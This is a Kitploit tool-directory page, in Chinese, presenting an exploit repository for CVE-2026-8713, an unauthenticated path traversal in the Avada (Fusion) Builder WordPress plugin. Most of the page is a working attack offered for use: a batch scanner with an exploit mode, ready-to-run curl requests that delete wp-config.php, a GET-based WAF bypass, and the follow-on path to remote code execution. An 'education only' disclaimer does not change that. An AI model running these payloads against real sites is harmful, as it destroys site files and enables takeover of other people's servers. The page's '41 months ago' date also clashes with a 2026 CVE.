Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-8713 — Pre-auth 路径遍历导致 Avada (Fusion) Builder <= 3.15.3 中任意文件删除,进而实现 RCE (CVSS 9.1) | Kitploit
工具/GitHubGitHub/shinthink/cve-2026-8713
漏洞扫描器漏洞分析漏洞利用Web应用程序漏洞利用WAF绕过Web安全渗透测试学习与教育
GitHubshinthink/cve-2026-8713

CVE-2026-8713

Pre-auth 路径遍历导致 Avada (Fusion) Builder <= 3.15.3 中任意文件删除,进而实现 RCE (CVSS 9.1)

查看仓库
41个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-8713 — Avada (Fusion) Builder WordPress 漏洞利用

未经认证的路径遍历 → 任意文件删除 → 强制重装 → 远程代码执行


概述

CVE-2026-8713 是 WordPress 的 Avada (Fusion) Builder 插件/主题中的一个 CVSS 9.1 严重漏洞。Fusion_Form_DB_Entries 类中的 maybe_delete_files() 函数使用简单的字符串替换,从攻击者控制的表单条目值构建文件系统路径——不经过 realpath() 验证或目录包含检查。

未经认证的攻击者通过 fusion_form_submit_ajax 处理器提交一个路径遍历负载。当 Fusion_Form_DB_Privacy 关闭钩子处理该条目(privacy_expiration_action=delete)时,目标文件会从服务器被删除。

受影响版本

版本状态
Fusion Builder ≤ 3.15.3存在漏洞
Fusion Builder ≥ 3.15.4已修补
Avada 主题(所有)捆绑的插件可能仍存在漏洞

注意: Avada 主题版本(7.x)与 Fusion Builder 插件版本(3.x)不同。漏洞位于插件中,但扫描器会检测两者。


漏洞机制

根本原因

在 fusion-builder/inc/class-fusion-form-db-entries.php 中,maybe_delete_files() 方法通过字符串替换解析文件路径,不进行包含验证:

root@kitploit:~
$file_path = str_replace($upload['url'], $upload['path'], $value);
// 没有 realpath() 检查——路径遍历序列会直接通过
unlink($file_path);

攻击链

root@kitploit:~
1. 攻击者通过 wp_ajax_nopriv_fusion_form_submit_ajax 提交 Avada 表单
   → 路径遍历: ../../wp-config.php
   → privacy_expiration_action = delete
   → privacy_expiration_interval = 0

2. WordPress 关闭钩子触发 Fusion_Form_DB_Privacy
   → 处理存储的表单条目
   → 对攻击者控制的路径调用 maybe_delete_files()
   → wp-config.php 被删除

3. WordPress 进入设置/安装模式
   → 攻击者将站点连接到恶意数据库
   → 完全远程代码执行

未经认证的访问

AJAX 处理器注册了 wp_ajax_nopriv_,使得未认证用户也可以访问:

root@kitploit:~
POST /wp-admin/admin-ajax.php
  action=fusion_form_submit_ajax
  form_id=<id>
  privacy_expiration_action=delete
  fusion_privacy_expiration_interval=0
  fusion_form_field_<name>=../../wp-config.php

WAF 绕过

许多主机屏蔽了对 /wp-admin/admin-ajax.php 的 POST 请求。WordPress 在此端点上接受通过 GET 传递的参数,提供了一种简单的绕过方式:

root@kitploit:~
GET /wp-admin/admin-ajax.php?action=fusion_form_submit_ajax&form_id=<id>&privacy_expiration_action=delete&...

安装

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-8713.git
cd CVE-2026-8713
pip install -r requirements.txt

使用方法

root@kitploit:~
# 仅检测(默认——不删除文件)
python cve_2026_8713.py -t target.com

# 批量检测
python cve_2026_8713.py -f targets.txt

# 漏洞利用模式——删除 wp-config.php
python cve_2026_8713.py -t target.com --exploit

# 删除自定义文件
python cve_2026_8713.py -t target.com --exploit --delete "../../../debug.log"

参数

root@kitploit:~
  -t, --target      单个目标(域名或 IP)
  -f, --file        目标列表,每行一个
  --exploit         启用文件删除(默认:仅检测)
  --delete PATH     要删除的自定义文件路径(默认:wp-config.php)
  -o, --output      将结果保存到文件
  --threads         工作线程数(默认:20)
  -v, --verbose     显示详细输出

概念验证

检测模式

root@kitploit:~
$ python cve_2026_8713.py -f targets.txt
root@kitploit:~
  CVE-2026-8713  Avada (Fusion) Builder  |  CVSS 9.1
  模式: 检测  |  目标数: 521  |  线程数: 20
  ───────────────────────────────────────────────────────

  [利用]  target-vuln.com      1.2s  表单 #3  (AJAX 可访问)
  [漏洞]  target-waf.com       2.1s  表单 #1  (WAF 已拦截)
  [AVADA] target-noform.com    0.5s  (未找到表单)
  [-]     target-noavada.com   0.3s

  ───────────────────────────────────────────────────────
  扫描完成  |  耗时: 45s
  ───────────────────────────────────────────────────────
  目标总数        : 521
  检测到 Avada   : 47
  找到表单        : 12
  存在漏洞        : 9

漏洞利用模式

root@kitploit:~
$ python cve_2026_8713.py -t target.com --exploit -v
root@kitploit:~
  CVE-2026-8713 — Avada Builder 漏洞利用
  CVSS 9.1 | 未认证 | 路径遍历 → 文件删除 → 远程代码执行

    [+] 发现 Avada 表单: id=3
    [+] POST form_id=3: HTTP 403 (WAF 拦截)
    [+] GET form_id=3: HTTP 200 (WAF 绕过)

  主机     : target.com
  Avada    : 是
  表单     : 3
  已删除   : wp-config.php (强制重装 → 远程代码执行)
  耗时     : 3.2s

手动利用

步骤 1 — 验证 Avada

root@kitploit:~
curl -sk 'https://target.com/wp-content/themes/Avada/style.css' | head -5

步骤 2 — 查找表单 ID

root@kitploit:~
curl -sk 'https://target.com/' | grep -oP 'fusion-form[^"]*form-id=["\x27](https://github.com/shinthink/cve-2026-8713/blob/HEAD/%5Cd+)'

步骤 3 — 通过路径遍历提交表单

root@kitploit:~
curl -sk -X POST \
  -d 'action=fusion_form_submit_ajax' \
  -d 'form_id=3' \
  -d 'privacy_expiration_action=delete' \
  -d 'fusion_privacy_expiration_interval=0' \
  -d 'fusion_form_field_x=../../wp-config.php' \
  'https://target.com/wp-admin/admin-ajax.php'

步骤 4 — WAF 绕过(如果 POST 被拦截)

root@kitploit:~
curl -sk 'https://target.com/wp-admin/admin-ajax.php?action=fusion_form_submit_ajax&form_id=3&privacy_expiration_action=delete&fusion_privacy_expiration_interval=0&fusion_form_field_x=../../wp-config.php'

步骤 5 — 验证并利用远程代码执行

root@kitploit:~
# 站点进入安装模式?
curl -sk -o /dev/null -w '%{http_code}' 'https://target.com/wp-admin/install.php'
# HTTP 200 → wp-config 被删除 → 连接恶意数据库 → 完全远程代码执行

免责声明

仅供教育和授权测试使用。

本软件适用于执行授权渗透测试的安全专业人员、审计自身基础设施的组织以及研究漏洞利用的研究人员。

未经授权访问计算机系统是非法的,可能违反:

  • 美国:计算机欺诈和滥用法案(18 U.S.C. 1030)
  • 印度尼西亚:UU ITE 第 30 条和第 46 条
  • 欧盟:2013/40/EU 指令
  • 英国:计算机滥用法案 1990

作者对滥用行为不承担任何责任。


参考


本项目与 ThemeFusion 或 Avada 无关。

下载工具
资源链接
IONIX 通告ionix.io/threat-center/cve-2026-8713
Wordfence 通告wordfence.com
Patchstackpatchstack.com
NVD 条目CVE-2026-8713